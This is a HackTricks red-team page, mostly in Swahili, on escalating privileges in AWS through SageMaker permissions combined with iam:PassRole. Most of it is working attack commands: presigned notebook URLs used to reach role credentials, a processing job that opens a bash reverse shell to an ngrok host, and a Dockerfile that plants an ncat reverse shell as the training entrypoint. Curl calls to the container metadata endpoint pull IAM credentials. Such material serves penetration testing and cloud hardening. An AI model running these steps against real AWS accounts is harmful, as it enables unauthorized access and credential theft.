AWS - Sagemaker Privesc

Reading time: 5 minutes

AWS - Sagemaker Privesc

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

iam:PassRole , sagemaker:CreateNotebookInstance, sagemaker:CreatePresignedNotebookInstanceUrl

Anza kuunda noteboook na IAM Role ili kupata iliyoambatanishwa nayo:

bash
aws sagemaker create-notebook-instance --notebook-instance-name example \
--instance-type ml.t2.medium \
--role-arn arn:aws:iam::<account-id>:role/service-role/<role-name>

Majibu yanapaswa kuwa na uwanja wa NotebookInstanceArn, ambao utaonyesha ARN ya mfano mpya wa notebook ulioanzishwa. Tunaweza kisha kutumia API ya create-presigned-notebook-instance-url kuunda URL ambayo tunaweza kutumia kufikia mfano wa notebook mara itakapokuwa tayari:

bash
aws sagemaker create-presigned-notebook-instance-url \
--notebook-instance-name <name>

Naviga kwenye URL na kivinjari na ubofye `Open JupyterLab` katika kona ya juu kulia, kisha shuka chini hadi kwenye tab ya “Launcher” na chini ya sehemu ya “Other”, bofya kitufe cha “Terminal”.

Sasa inawezekana kufikia akreditif za metadata za IAM Role.

Madhara Yanayoweza Kutokea: Privesc kwa huduma ya sagemaker iliyotajwa.

sagemaker:CreatePresignedNotebookInstanceUrl

Ikiwa kuna Jupyter notebooks tayari zinaendesha kwenye hiyo na unaweza kuorodhesha hizo kwa sagemaker:ListNotebookInstances (au kuzipata kwa njia nyingine yoyote). Unaweza kuunda URL kwa ajili yao, kuzipata, na kuiba akreditif kama ilivyoonyeshwa katika mbinu ya awali.

bash
aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name <name>

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya sagemaker lililounganishwa.

sagemaker:CreateProcessingJob,iam:PassRole

Mshambuliaji mwenye ruhusa hizo anaweza kufanya sagemaker itekeleze processingjob yenye jukumu la sagemaker lililounganishwa. Mshambuliaji anaweza kuashiria ufafanuzi wa kontena ambalo litakimbia katika AWS managed ECS account instance, na kuiba akauti za IAM zilizounganishwa.

bash
# I uploaded a python docker image to the ECR
aws sagemaker create-processing-job \
--processing-job-name privescjob \
--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
--app-specification "{\"ImageUri\":\"<id>.dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
--role-arn <sagemaker-arn-role>

# In my tests it took 10min to receive the shell
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya sagemaker lililotajwa.

sagemaker:CreateTrainingJob, iam:PassRole

Mshambuliaji mwenye ruhusa hizo ataweza kuunda kazi ya mafunzo, ikiendesha kontena chochote juu yake na jukumu lililounganishwa nalo. Hivyo, mshambuliaji ataweza kuiba akidi za jukumu hilo.

warning

Hali hii ni ngumu zaidi kutekeleza kuliko ile ya awali kwa sababu unahitaji kuunda picha ya Docker ambayo itatuma rev shell au creds moja kwa moja kwa mshambuliaji (huwezi kuashiria amri ya kuanzia katika usanidi wa kazi ya mafunzo).

# Unda picha ya docker
mkdir /tmp/rev
## Kumbuka kwamba kazi ya mafunzo itaita executable inayoitwa "train"
## Ndio maana ninaweka rev shell katika /bin/train
## Weka thamani za <YOUR-IP-OR-DOMAIN> na <YOUR-PORT>
cat > /tmp/rev/Dockerfile <<EOF
FROM ubuntu
RUN apt update && apt install -y ncat curl
RUN printf '#!/bin/bash\nncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh' > /bin/train
RUN chmod +x /bin/train
CMD ncat <YOUR-IP-OR-DOMAIN> <YOUR-PORT> -e /bin/sh
EOF

cd /tmp/rev
sudo docker build . -t reverseshell

# Ipelekwe kwa ECR
sudo docker login -u AWS -p $(aws ecr get-login-password --region <region>) <id>.dkr.ecr.<region>.amazonaws.com/<repo>
sudo docker tag reverseshell:latest <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
sudo docker push <account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell:latest
bash
# Create trainning job with the docker image created
aws sagemaker create-training-job \
--training-job-name privescjob \
--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
--algorithm-specification '{"TrainingImage":"<account_id>.dkr.ecr.<region>.amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
--role-arn <role-arn> \
--output-data-config '{"S3OutputPath": "s3://<bucket>"}' \
--stopping-condition '{"MaxRuntimeInSeconds": 600}'

#To get the creds
curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
## Creds env var value example:/v2/credentials/proxy-f00b92a68b7de043f800bd0cca4d3f84517a19c52b3dd1a54a37c1eca040af38-customer

Madhara Yanayoweza Kutokea: Privesc kwa jukumu la huduma ya sagemaker lililotajwa.

sagemaker:CreateHyperParameterTuningJob, iam:PassRole

Mshambuliaji mwenye ruhusa hizo ataweza (kwa uwezekano) kuunda ajira ya mafunzo ya hyperparameter, akikimbia kontena yoyote juu yake na jukumu lililounganishwa nalo.
Sijafanya unyakuzi kwa sababu ya ukosefu wa muda, lakini inaonekana kama unyakuzi wa awali, jisikie huru kutuma PR yenye maelezo ya unyakuzi.

Marejeleo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks